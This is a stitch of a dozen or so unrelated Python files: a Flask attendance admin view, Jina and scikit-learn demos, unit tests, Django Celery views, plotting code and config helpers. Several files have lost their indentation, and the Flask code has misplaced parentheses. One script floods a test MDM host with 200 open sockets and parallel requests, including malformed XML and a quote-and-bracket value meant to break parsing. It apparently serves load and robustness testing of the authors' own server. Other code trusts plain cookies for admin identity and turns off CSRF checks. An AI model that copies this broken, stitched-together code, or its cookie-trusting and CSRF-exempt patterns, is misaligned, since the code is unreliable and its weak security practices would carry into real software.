response.set_cookie('Disp','null',max_age = 0)
response.set_cookie('User','null',max_age = 0)
response.set_cookie('From','null',max_age = 0)
Ids = Info.getIds()
c = 0
while(c<len(Ids)):
if(request.form['Edit'+str(Ids[c])]):
response = make_response(redirect(url_for('Home')))
                    date = request.cookies.get('From')
checkIn = request.form['CheckIn'+str(Ids[c])]
checkOut = request.form['CheckOut'+str(Ids[c])]
nothing = Info.AdminOverride(checkOut,date,Ids[c],Out = True)
nothing = Info.AdminOverride(checkIn,date,Ids[c],Out = False)
c += 1
else:
if(request.cookies.get('User')):
                if(int(request.cookies.get('User')) >= 0):
                    uTab,UserTime,first,last = Info.GetUserData(request.cookies.get('User'))
                    response = make_response(render_template('AdminHome.html', table = uTab, head = str(first)+" "+str(last)))
else:
if(request.cookies.get('From')):
                    Ftab,Atab,Ptab,Ctab,headdate = Info.GetSummary(request.cookies.get('From'))
else:
                    now = datetime.datetime.now()
                    Ftab,Atab,Ptab,Ctab,headdate = Info.GetSummary(str(now.month)+str(now.day))
if(request.cookies.get('Disp')):
q = request.cookies.get('Disp')
if(q == "absent"):
response = make_response(render_template('AdminHome.html'),table = Atab,head="Absent "+headdate)
elif(q == "present"):
response = make_response(render_template('AdminHome.html'),table = Ptab,head="Currently Present "+headdate)
elif(q == "checked out"):
response = make_response(render_template('AdminHome.html'),table = Ctab,head="Checked Out "+headdate)
elif(q == "user"):
none = Info.GetTotalMatrix()
uTab,UserTime,first,last = Info.GetUserData(request.cookies.get('User'))
response = make_response(render_template('AdminHome.html'),table = Ctab,head=str(first)+" "+str(last))
else:
response = make_response(render_template('AdminHome.html'),table = Ftab,head=headdate)
Certificate = LoginInfo.WriteCertificate(path,UserID) #new certificate
response.set_cookie('Certificate',Certificate)
return response
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import os
import random
import sys
from jina.drivers import BaseDriver
from jina.flow import Flow
class RandomPopRanker(BaseDriver):
max_num_docs = 100
def __call__(self, *args, **kwargs):
for d in self.req.docs:
for k in range(self.req.top_k):
r = d.topk_results.add()
r.match_doc.doc_id = random.randint(0, self.max_num_docs)
r.score.value = random.random()
def config():
os.environ['WORKDIR'] = './workspace'
os.makedirs(os.environ['WORKDIR'], exist_ok=True)
os.environ['JINA_PORT'] = os.environ.get('JINA_PORT', str(45678))
def index():
f = Flow().add(uses='indexer.yml')
with f:
f.index_files(sys.argv[2])
def search():
f = (Flow(rest_api=True, port_expose=int(os.environ['JINA_PORT']))
.add(uses='- !RandomPopRanker {}')
.add(uses='indexer.yml'))
with f:
f.block()
if __name__ == '__main__':
if len(sys.argv) < 2:
print('choose between "index" and "search" mode')
exit(1)
if sys.argv[1] == 'index':
config()
workspace = os.environ['WORKDIR']
if os.path.exists(workspace):
print(f'\n +---------------------------------------------------------------------------------+ \
\n | 🤖🤖🤖 | \
\n | The directory {workspace} already exists. Please remove it before indexing again. | \
\n | 🤖🤖🤖 | \
\n +---------------------------------------------------------------------------------+')
index()
elif sys.argv[1] == 'search':
config()
search()
else:
raise NotImplementedError(f'unsupported mode {sys.argv[1]}')
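# Usage sketch (illustrative; the data glob is hypothetical):
#
#   python app.py index 'data/*.txt'   # build the index via indexer.yml
#   python app.py search               # expose the REST gateway on JINA_PORT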
|
import numpy as np
import pandas as pd
from sklearn import preprocessing, model_selection, svm, neighbors, linear_model, discriminant_analysis, naive_bayes, tree
from utils import general
df = pd.read_csv('iris.data.txt', names=['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class'])
df = df.replace({'class': {'Iris-setosa': 3, 'Iris-versicolor': 5, 'Iris-virginica': 7}})
X = np.array(df.drop(['class'], 1))
X = preprocessing.scale(X)
y = np.array(df['class'])
gen = general.General()
gen.fit_score_print(X, y)
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.2)
# prepare models
models = []
models.append(('LR', linear_model.LogisticRegression()))
models.append(('LDA', discriminant_analysis.LinearDiscriminantAnalysis()))
models.append(('KNN', neighbors.KNeighborsClassifier()))
models.append(('CART', tree.DecisionTreeClassifier()))
models.append(('NB', naive_bayes.GaussianNB()))
models.append(('SVM', svm.SVC()))
for name, model in models:
model.fit(X_train, y_train)
accuracy = model.score(X_test, y_test)
print(name, accuracy) |
#!/usr/bin/env python3
# encoding: utf-8
import setuptools
setuptools.setup(
name='reactor_bot',
version='4.5.15',
url='https://github.com/iomintz/reactor-bot',
author='Io Mintz',
author_email='[email protected]',
description='The best dang Discord poll bot around™',
long_description=open('README.rst').read(),
packages=[
'reactor_bot',
'reactor_bot.cogs'],
install_requires=[
'asyncpg',
'bot_bin[sql]>=1.0.1,<2.0.0',
'discord.py>=1.2.3,<2.0.0',
'inflect',
'jishaku'],
python_requires='>=3.6',
extras_require={
'dev': [
'bumpversion'],
'test': [
'pytest',
'pytest-cov',
'freezegun']},
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'License :: OSI Approved :: MIT License'])
|
# -*- coding: utf-8 -*-
"""Test the layerresponse functions defined in layers.py."""
import unittest
import numpy as np
import smuthi.layers as lay
import smuthi.fields.expansions as fldex
layer_d = [0, 300, 400, 0]
layer_n = [1, 2 + 0.1j, 3, 1 + 5j]
omega = 2 * 3.15 / 550
kpar = omega * 1.7
precision = 15
class TestLayerResponse(unittest.TestCase):
def test_layerresponse_mpmath_equals_numpy(self):
"""Are the results with multiple precision consistent with numpy equivalent?"""
for pol in [0, 1]:
for fromlayer in range(len(layer_d)):
for tolayer in range(len(layer_d)):
lay.set_precision(None)
lmat1 = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
lay.set_precision(precision)
lmat2 = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
np.testing.assert_almost_equal(lmat1, lmat2)
lay.set_precision(None)
def test_scattering_matrix_equals_transfer_matrix(self):
"""Are the results from the transfer matrix algorithm and from the scattering matrix algorithm consistent?"""
for pol in [0, 1]:
tmat = lay.layersystem_transfer_matrix(pol, layer_d, layer_n, kpar, omega)
smat = lay.layersystem_scattering_matrix(pol, layer_d, layer_n, kpar, omega)
np.testing.assert_almost_equal(tmat[1, 0] / tmat[0, 0], smat[1, 0])
def test_layerresponse_against_prototype(self):
"""Are the results from layers.py and consistent with the MATLAB prototype code TSPL?"""
pol = 0
fromlayer = 2
tolayer = 1
lmat = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
lmat_TSPL = np.array([[-0.392979481352895 - 0.376963315605839j, -0.455367266697897 + 0.426065579868901j],
[0.545168303416962 - 0.345873455516963j, -0.361796569025878 - 0.644799225334747j]])
np.testing.assert_almost_equal(lmat, lmat_TSPL)
pol = 1
fromlayer = 1
tolayer = 2
lmat = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
lmat_TSPL = np.array([[-0.240373686730040 - 0.148769054113797j, 0.161922209423045 + 0.222085165907288j],
[-0.182951011363592 + 0.138158890222525j, 0.215395950986834 - 0.057346289106977j]])
np.testing.assert_almost_equal(lmat, lmat_TSPL)
def test_layerresponse_for_kpar_arrays(self):
pol = 1
fromlayer = 2
tolayer = 1
kpar_array = np.linspace(0, kpar)
lmat_vec = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar_array, omega, fromlayer, tolayer)
lmat_end = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar_array[-1], omega, fromlayer, tolayer)
lmat0 = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar_array[0], omega, fromlayer, tolayer)
np.testing.assert_almost_equal(lmat_end, lmat_vec[:, :, -1])
np.testing.assert_almost_equal(lmat0, lmat_vec[:, :, 0])
def test_layerresponse_method(self):
fromlayer=2
tolayer=1
kp = np.linspace(0, 2) * omega
a = np.linspace(0, 2*np.pi)
layer_system = lay.LayerSystem(thicknesses=layer_d, refractive_indices=layer_n)
ref = [0, 0, layer_system.reference_z(fromlayer)]
pwe_up = fldex.PlaneWaveExpansion(k=omega*1.2, k_parallel=kp, azimuthal_angles=a, kind='upgoing',
reference_point=ref)
pwe_up.coefficients[0,:, :] = np.exp(-pwe_up.k_parallel_grid()/omega)
pwe_down = fldex.PlaneWaveExpansion(k=omega * 1.2, k_parallel=kp, azimuthal_angles=a, kind='downgoing',
reference_point=ref)
pwe_down.coefficients[0, :, :] = 2j * np.exp(-pwe_up.k_parallel_grid() / omega * 3)
pwe_r_up, pwe_r_down = layer_system.response(pwe_up, fromlayer, tolayer)
pwe_r_up2, pwe_r_down2 = layer_system.response(pwe_down, fromlayer, tolayer)
pwe_r_up3, pwe_r_down3 = layer_system.response((pwe_up, pwe_down), fromlayer, tolayer)
        # the layer response is linear, so the response to the tuple should equal
        # the sum of the responses to the individual expansions
        np.testing.assert_almost_equal(
            pwe_r_up.coefficients[0, 0, 0] + pwe_r_up2.coefficients[0, 0, 0],
            pwe_r_up3.coefficients[0, 0, 0])
        np.testing.assert_almost_equal(
            pwe_r_down.coefficients[0, 0, 0] + pwe_r_down2.coefficients[0, 0, 0],
            pwe_r_down3.coefficients[0, 0, 0])
if __name__ == '__main__':
unittest.main()
|
'''
A message containing letters from A-Z can be encoded into numbers using the following mapping:
'A' -> "1"
'B' -> "2"
...
'Z' -> "26"
To decode an encoded message, all the digits must be grouped then mapped back into letters using the reverse of the mapping above (there may be multiple ways). For example, "11106" can be mapped into:
"AAJF" with the grouping (1 1 10 6)
"KJF" with the grouping (11 10 6)
Note that the grouping (1 11 06) is invalid because "06" cannot be mapped into 'F' since "6" is different from "06".
Given a string s containing only digits, return the number of ways to decode it.
The answer is guaranteed to fit in a 32-bit integer.
Input: s = "5"
Output: 1
Input: s = "12"
Output: 2
Explanation: "12" could be decoded as "AB" (1 2) or "L" (12).
Input: s = "226"
Output: 3
Explanation: "226" could be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
Precondition:
n = len(s)
n >= 1
Postcondition:
s stay unchanged
result > 0
C1: n = 1
C2: n = 2
C3: n >= 3
C4: contains 0
Algo:
DP:
Definition: dp[i] = number of combinations with s[:i]
Base Case: dp[0] = 1
dp[1] = 1 if s[0] not 0
    RR: dp[i+1] = (dp[i] if s[i] != '0' else 0) + (dp[i-1] if '10' <= s[i-1:i+1] <= '26' else 0)
Result: dp[n]
Runtime: O(n)
Space: O(n)
'''
class Solution:
def numDecodings(self, s: str) -> int:
n = len(s)
dp = [0 for _ in range(n+1)]
dp[0] = 1
dp[1] = 1 if s[0] != '0' else 0
for i in range(1, n):
if s[i] != '0':
dp[i+1] = dp[i]
if s[i-1] == '1':
dp[i+1] = dp[i+1] + dp[i-1]
elif s[i-1] == '2' and int(s[i]) <= 6:
dp[i+1] = dp[i+1] + dp[i-1]
return dp[n]
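# Minimal usage sketch (added for illustration, not part of the original solution);
# the expected values follow the examples given in the docstring above.
if __name__ == '__main__':
    _solver = Solution()
    assert _solver.numDecodings("5") == 1
    assert _solver.numDecodings("12") == 2
    assert _solver.numDecodings("226") == 3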
|
import logging
import imio
import numpy as np
from skimage.segmentation import find_boundaries
def boundaries(registered_atlas, boundaries_out_path):
"""
Generate the boundary image, which is the border between each segmentation
region. Useful for overlaying on the raw image to assess the registration
and segmentation
:param registered_atlas: The registered atlas
:param boundaries_out_path: Path to save the boundary image
"""
atlas_img = imio.load_any(registered_atlas)
boundaries_image = find_boundaries(atlas_img, mode="inner").astype(
np.int8, copy=False
)
logging.debug("Saving segmentation boundary image")
imio.to_tiff(
boundaries_image,
boundaries_out_path,
)
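# Usage sketch (illustrative; the file paths are hypothetical):
#
#   boundaries("registered_atlas.tiff", "boundaries.tiff")
#
# This loads the registered atlas, marks the inner borders between labelled
# regions and writes them to a TIFF for overlaying on the raw image.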
|
import pytest
@pytest.mark.parametrize("route, expected", [
("/youtube/PLdduFHK2eLvfGM7ADIbCgWHFRvu1yBNj0/", "Now, Now - MJ")
])
def test_youtube(client, route, expected):
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/vimeo/album/3951181/", "Rollercoaster Girl")
])
def test_vimeo(client, route, expected):
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/custom/youtube:1nvNKi-QT2Q/youtube:YpYSUWrF59A/", "PEN AND PAPER THEME SONG")
])
def test_custom_playlist(client, route, expected):
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/youtube/invalid-playlist/test/", "URL not found"),
("/youtube/invalid-playlist/", "This playlist is either empty, private or non-existing"),
("/vimeo/channel/invalid-channel/", "This album/channel is either empty, private or non-existing")
])
def test_routes_i18n_en(client, route, expected, app):
with app.app_context():
app.config['BABEL_DEFAULT_LOCALE'] = 'en'
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/youtube/invalid-playlist/test/", "URL nicht gefunden"),
("/youtube/invalid-playlist/", "Diese Playlist ist entweder leer, privat oder existiert nicht"),
("/vimeo/channel/invalid-channel/", "Dieses Album bzw. dieser Channel ist entweder leer, privat oder existiert nicht")
])
def test_routes_i18n_de(client, route, expected, app):
with app.app_context():
app.config['BABEL_DEFAULT_LOCALE'] = 'de'
response = client.get(route)
assert expected.encode('ascii') in response.data
|
import json
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib.patches import Rectangle as rectangle
import seaborn as sns
import string
from PIL import Image
import io
import sys
import matplotlib.font_manager as fm
def retrieve_expected_responses_and_hist(expected_NV_model_responses_file_name,
NV_model_hist_file_name):
with open(expected_NV_model_responses_file_name + '.json', 'r') as json_file:
[expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power] = json.load(json_file)
with open(NV_model_hist_file_name + '.json', 'r') as json_file:
NV_model_one_and_two_patient_pop_hist = np.array(json.load(json_file))
return [expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist]
def plot_predicted_statistical_powers_and_NV_model_hists(expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist,
monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max):
print( '\nNV model one RR50 statistical power: ' + str(np.round(100*expected_NV_model_one_RR50_nn_stat_power, 3)) + ' %' + \
'\nNV model two RR50 statistical power: ' + str(np.round(100*expected_NV_model_two_RR50_nn_stat_power, 3)) + ' %' + \
'\nNV model one MPC statistical power: ' + str(np.round(100*expected_NV_model_one_MPC_nn_stat_power, 3)) + ' %' + \
'\nNV model two MPC statistical power: ' + str(np.round(100*expected_NV_model_two_MPC_nn_stat_power, 3)) + ' %' + \
'\nNV model one TTP statistical power: ' + str(np.round(100*expected_NV_model_one_TTP_nn_stat_power, 3)) + ' %' + \
'\nNV model two TTP statistical power: ' + str(np.round(100*expected_NV_model_two_TTP_nn_stat_power, 3)) + ' %' + '\n' )
monthly_mean_axis_start = monthly_mean_min
monthly_mean_axis_stop = monthly_mean_max - 1
monthly_mean_axis_step = 1
monthly_mean_tick_spacing = 1
monthly_std_dev_axis_start = monthly_std_dev_min
monthly_std_dev_axis_stop = monthly_std_dev_max - 1
monthly_std_dev_axis_step = 1
monthly_std_dev_tick_spacing = 1
monthly_mean_tick_labels = np.arange(monthly_mean_axis_start, monthly_mean_axis_stop + monthly_mean_tick_spacing, monthly_mean_tick_spacing)
monthly_std_dev_tick_labels = np.arange(monthly_std_dev_axis_start, monthly_std_dev_axis_stop + monthly_std_dev_tick_spacing, monthly_std_dev_tick_spacing)
monthly_mean_ticks = monthly_mean_tick_labels/monthly_mean_axis_step + 0.5 - 1
monthly_std_dev_ticks = monthly_std_dev_tick_labels/monthly_std_dev_axis_step + 0.5 - 1
monthly_std_dev_ticks = np.flip(monthly_std_dev_ticks, 0)
n_groups = 3
index = np.arange(n_groups)
bar_width = 0.35
opacity = 0.8
NV_model_one_endpoint_stat_powers = 100*np.array([expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power])
NV_model_two_endpoint_stat_powers = 100*np.array([expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power])
reg_prop = fm.FontProperties(fname='/Users/juanromero/Documents/GitHub/rct-SNR/Calibri Regular.ttf')
bold_prop = fm.FontProperties(fname='/Users/juanromero/Documents/GitHub/rct-SNR/Calibri Bold.ttf')
fig = plt.figure(figsize=(20, 6))
ax = plt.subplot(1,2,1)
ax = sns.heatmap(NV_model_one_and_two_patient_pop_hist, cmap='RdBu_r', cbar_kws={'label':'Number of patients'})
cbar = ax.collections[0].colorbar
ax.set_xticks(monthly_mean_ticks)
ax.set_xticklabels(monthly_mean_tick_labels, rotation='horizontal')
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(11)
ax.set_yticks(monthly_std_dev_ticks)
ax.set_yticklabels(monthly_std_dev_tick_labels, rotation='horizontal')
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(11)
    cbar.set_label('Number of patients', fontproperties=reg_prop, fontsize=14)
ax.set_xlabel(r'monthly seizure count mean, $\mu$', fontproperties=reg_prop, fontsize=14)
ax.set_ylabel(r'monthly seizure count standard deviation, $\sigma$', fontproperties=reg_prop, fontsize=14)
ax.title.set_text('2D histograms of patients from NV model 1 and 2')
ax.text(-0.2, 1, string.ascii_uppercase[0] + ')',
fontproperties=bold_prop, transform=ax.transAxes, size=20)
NV_model_1_rect = rectangle((0.5, 11.5), 5, 3, 0, edgecolor='xkcd:apple green', facecolor='none', linewidth=3)
NV_model_2_rect = rectangle((5.5, 9.5), 7, 4, 0, edgecolor='xkcd:vivid green', facecolor='none', linewidth=3)
ax.add_artist(NV_model_1_rect)
ax.add_artist(NV_model_2_rect)
ax.text(0.6, 11.2,
'NV Model 1',
fontproperties=reg_prop,
fontsize=16,
color='white')
ax.text(8.6, 9.2,
'NV Model 2',
fontproperties=reg_prop,
fontsize=16,
color='white')
'''
fontdict = {'family': 'serif',
'color': 'white',
'weight': 'normal',
'size': 16}
'''
#ax.legend([NV_model_1_rect, NV_model_2_rect], ['NV Model 1', 'NV Model 2'], loc='upper left')
plt.subplot(1,2,2)
plt.bar(index,
NV_model_one_endpoint_stat_powers,
bar_width,
alpha=opacity,
color='b',
label='NV Model one')
plt.bar(index + bar_width,
NV_model_two_endpoint_stat_powers,
bar_width,
alpha=opacity,
color='g',
label='NV Model two')
plt.xlabel('endpoint', fontproperties=reg_prop, fontsize=14)
plt.ylabel('statistical power', fontproperties=reg_prop, fontsize=14)
plt.title('average predicted statistical powers', fontproperties=reg_prop, fontsize=14)
plt.xticks(index + bar_width/2, ('RR50', 'MPC', 'TTP'), fontproperties=reg_prop, fontsize=14)
plt.yticks(np.arange(0, 110, 10))
ax = plt.gca()
ax.yaxis.set_major_formatter(ticker.PercentFormatter(xmax=100))
ax.yaxis.grid(True)
plt.legend(prop=reg_prop)
ax.text(-0.2, 1, string.ascii_uppercase[1] + ')',
fontproperties=bold_prop, transform=ax.transAxes, size=20, weight='bold')
plt.subplots_adjust(wspace = .25)
png1 = io.BytesIO()
fig.savefig(png1, dpi = 600, bbox_inches = 'tight', format = 'png')
png2 = Image.open(png1)
png2.save('Romero-fig4.tiff')
png1.close()
def take_inputs_from_command_shell():
monthly_mean_min = int(sys.argv[1])
monthly_mean_max = int(sys.argv[2])
monthly_std_dev_min = int(sys.argv[3])
monthly_std_dev_max = int(sys.argv[4])
expected_NV_model_responses_file_name = sys.argv[5]
NV_model_hist_file_name = sys.argv[6]
return [monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max,
expected_NV_model_responses_file_name,
NV_model_hist_file_name]
if(__name__=='__main__'):
[monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max,
expected_NV_model_responses_file_name,
NV_model_hist_file_name] = \
take_inputs_from_command_shell()
[expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist] = \
retrieve_expected_responses_and_hist(expected_NV_model_responses_file_name,
NV_model_hist_file_name)
plot_predicted_statistical_powers_and_NV_model_hists(expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist,
monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max)
|
from datetime import timedelta
from operator import methodcaller
from testtools.content import text_content
from testtools.matchers import AfterPreprocessing as After
from testtools.matchers import (
Equals, GreaterThan, IsInstance, LessThan, MatchesAll, MatchesAny,
MatchesStructure, Mismatch)
class HasHeader(Equals):
def __init__(self, key, values):
"""
Checks for a certain header with certain values in the headers of a
response or request. Note that headers may be specified multiple times
and that the order of repeated headers is important.
:param str key:
The header name/key.
:param list values:
The list of values for the header.
"""
super(HasHeader, self).__init__(values)
self.key = key
def __str__(self):
return 'HasHeader(%s, %r)' % (self.key, self.expected,)
def match(self, headers):
"""
:param twisted.web.http_headers.Headers headers:
The response or request headers object.
"""
if not headers.hasHeader(self.key):
headers_content = text_content(
repr(dict(headers.getAllRawHeaders())))
return Mismatch(
'The response does not have a "%s" header' % (self.key,),
details={'raw headers': headers_content})
raw_values = headers.getRawHeaders(self.key)
return super(HasHeader, self).match(raw_values)
def IsJsonResponseWithCode(code):
"""
Match the status code on a treq.response object and check that a header is
set to indicate that the content type is JSON.
"""
return MatchesStructure(
code=Equals(code),
headers=HasHeader('Content-Type', ['application/json'])
)
def WithErrorTypeAndMessage(error_type, message):
"""
Check that a Twisted failure was caused by a certain error type with a
certain message.
"""
return MatchesAll(
MatchesStructure(value=IsInstance(error_type)),
After(methodcaller('getErrorMessage'), Equals(message))
)
def matches_time_or_just_before(time, tolerance=timedelta(seconds=10)):
"""
Match a time to be equal to a certain time or just before it. Useful when
checking for a time that is now +/- some amount of time.
"""
return MatchesAll(
GreaterThan(time - tolerance),
MatchesAny(LessThan(time), Equals(time)))
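# Illustrative usage sketch (not part of the original module; `response` and the
# test case are hypothetical stand-ins):
#
# from testtools import TestCase
#
# class ExampleTest(TestCase):
#     def test_json_response(self):
#         self.assertThat(response, IsJsonResponseWithCode(200))
#         self.assertThat(response.headers,
#                         HasHeader('Content-Type', ['application/json']))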
|
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from tasks.sample_tasks import create_task
from celery.result import AsyncResult
def home(request):
return render(request, "home.html")
@csrf_exempt
def run_task(request):
if request.POST:
task_type = request.POST.get("type")
task = create_task.delay(int(task_type))
return JsonResponse({"task_id": task.id}, status=202)
@csrf_exempt
def get_status(request, task_id):
task_result = AsyncResult(task_id)
result = {
"task_id": task_id,
"task_status": task_result.status,
"task_result": task_result.result
}
return JsonResponse(result, status=200)
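# A sketch of how these views might be routed (module names here are hypothetical,
# not taken from the original project's urls.py):
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('', views.home, name='home'),
#     path('tasks/', views.run_task, name='run_task'),
#     path('tasks/<task_id>/', views.get_status, name='get_status'),
# ]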
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import subprocess
import urllib2
import json
import time
import sys, os
import multiprocessing
sys.path.append(os.path.abspath(__file__ + '/../../library/'))
import copiedRequests
MDM_HOST = "tst-mdm.safekiddo.com"
PORT = 443
TIMEOUT = 5
DISCOVERY = "discovery"
DISCOVERY_MALFORMED = "discoveryMalformed"
DISCOVERY_WRONG_HEADER = "discoveryWrongHeader"
ENROLLMENT = "enrollment"
ENROLLMENT_MALFORMED = "enrollmentMalformed"
ENROLLMENT_WRONG_HEADER = "enrollmentWrongHeader"
OMADM = "omadm"
OMADM_MALFORMED = "omadmMalformed"
OMADM_WRONG_HEADER = "omadmWrongHeader"
DEVICE_ID = "43"
DEVICE_HARDWARE_ID = "6CAF8D6F-4A44-5802-A7A2-E79E344BABD4"
threads = []
def sendHealthChecks():
    for i in range(1, 10):
req = urllib2.Request("https://%s:%d/healthCheck/" % (MDM_HOST, PORT))
result = urllib2.urlopen(req, timeout = TIMEOUT).read()
time.sleep(1)
def sendRequest(type):
opener = urllib2.build_opener()
headers = None
data = None
catchServerError = False
url = "https://%s:%d/" % (MDM_HOST, PORT)
if type == DISCOVERY:
url += "EnrollmentServer/Discovery.svc"
headers = copiedRequests.getDiscoveryHeaders()
data = copiedRequests.getDiscoveryXml()
if type == DISCOVERY_MALFORMED:
catchServerError = True
url += "EnrollmentServer/Discovery.svc"
headers = copiedRequests.getDiscoveryHeaders()
data = copiedRequests.getDiscoveryXml()[7:50]
if type == DISCOVERY_WRONG_HEADER:
url += "EnrollmentServer/Discovery.svc"
headers = copiedRequests.getEnrollmentHeaders()
data = copiedRequests.getDiscoveryXml()
if type == ENROLLMENT:
url += "EnrollmentServer/Enrollment.svc"
headers = copiedRequests.getEnrollmentHeaders()
data = copiedRequests.getEnrollmentXml("[email protected]", "1234")
if type == ENROLLMENT_MALFORMED:
catchServerError = True
url += "EnrollmentServer/Enrollment.svc"
headers = copiedRequests.getEnrollmentHeaders()
data = copiedRequests.getEnrollmentXml('">\'<', '">\'<')
if type == ENROLLMENT_WRONG_HEADER:
catchServerError = True
url += "EnrollmentServer/Enrollment.svc"
headers = copiedRequests.getOmadmHeaders()
data = copiedRequests.getEnrollmentXml('">\'<', '">\'<')
if type == OMADM:
url += "omadm/WindowsPhone.ashx"
headers = copiedRequests.getOmadmHeaders()
data = copiedRequests.getOmadmXml(DEVICE_HARDWARE_ID, DEVICE_ID)
if type == OMADM_MALFORMED:
catchServerError = True
url += "omadm/WindowsPhone.ashx"
headers = copiedRequests.getOmadmHeaders()
data = copiedRequests.getOmadmXml(DEVICE_HARDWARE_ID, DEVICE_ID)[11:30]
if type == OMADM_WRONG_HEADER:
catchServerError = True
url += "omadm/WindowsPhone.ashx"
headers = copiedRequests.getDiscoveryHeaders()
data = copiedRequests.getOmadmXml(DEVICE_HARDWARE_ID, DEVICE_ID)
try:
request = urllib2.Request(url, data=data, headers=headers)
response = opener.open(request)
except urllib2.HTTPError:
if not catchServerError:
raise
def main():
sockets = {}
SOCKET_NUM = 200
for i in range(SOCKET_NUM):
sockets[i] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockets[i].connect((MDM_HOST, PORT))
print "%d sockets are opened" % SOCKET_NUM
HEALTHCHECK_NUM = 50
for i in range(HEALTHCHECK_NUM):
thread = multiprocessing.Process(target=sendHealthChecks)
threads.append(thread)
thread.start()
print "%d healtcheck threads started" % HEALTHCHECK_NUM
REPORT_REQUESTS_NUM = 10
types = [
DISCOVERY,
ENROLLMENT,
OMADM,
DISCOVERY_MALFORMED,
ENROLLMENT_MALFORMED,
OMADM_MALFORMED,
DISCOVERY_WRONG_HEADER,
ENROLLMENT_WRONG_HEADER,
OMADM_WRONG_HEADER
]
for i in range(REPORT_REQUESTS_NUM):
for type in types:
thread = multiprocessing.Process(target=sendRequest, args=[type])
threads.append(thread)
thread.start()
print "%d reports threads started" % (REPORT_REQUESTS_NUM * len(types))
if __name__ == '__main__':
try:
cleanExit = True
try:
main()
except (SystemExit, KeyboardInterrupt):
pass # --help in arguments
except:
cleanExit = False
raise
finally:
for t in threads:
t.join()
if cleanExit:
assert t.exitcode == 0, "thread exitcode should be 0 but is %s" % t.exitcode
print "OK"
|
import confuse as cf
def configure():
config = cf.Configuration('bud', __name__)
config.set_file('./config.yaml')
return config
def get_path():
cfg = configure()
return str(cfg["directory_path"])
|
# -*- encoding: utf-8 -*-
from habet.response import Response
class BaseServerError(Exception):
def __init__(self):
self.status = None
self.code = None
self.message = None
self.data = None
self.content_type = 'application/json'
def as_response(self):
body = {
'error': {
'code': self.code,
'message': self.message,
'data': self.data
}
}
headers = {
'Content-Type': self.content_type
}
return Response(status=self.status, headers=headers, body=body)
class MethodNotAllowedError(BaseServerError):
def __init__(self, method=None, path=None):
super(MethodNotAllowedError, self).__init__()
self.status = 405
self.code = -32000
self.message = 'Method not allowed.'
self.data = {
'method': method,
'path': path
}
class UnauthorizedError(BaseServerError):
def __init__(self, method=None, path=None):
super(UnauthorizedError, self).__init__()
self.status = 401
self.code = -32001
self.message = 'Unauthorized.'
self.data = {
'method': method,
'path': path
}
class ForbiddenError(BaseServerError):
def __init__(self, method=None, path=None):
super(ForbiddenError, self).__init__()
self.status = 403
self.code = -32002
self.message = 'Forbidden.'
self.data = {
'method': method,
'path': path
}
class NotFoundError(BaseServerError):
def __init__(self, method=None, path=None):
super(NotFoundError, self).__init__()
